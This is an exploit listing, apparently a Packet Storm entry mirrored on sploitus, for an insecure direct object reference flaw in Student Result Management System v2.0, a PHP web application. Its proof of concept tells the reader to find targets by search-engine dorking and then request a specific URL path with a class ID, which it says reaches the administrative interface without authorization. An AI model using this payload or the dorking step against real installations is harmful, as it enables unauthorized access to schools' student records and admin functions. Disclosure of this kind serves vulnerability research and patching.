Student Result Management System 2.0 Insecure Direct Object Reference exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181303 ============================================================================================================================================= | # Title : Student Result Management System v2.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) | | # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Student-Result-Management-System-Using-PHP-V2.0.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /edit-class.php?classid=1 [+] http://127.0.0.1/srms/edit-class.php?classid=1 Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================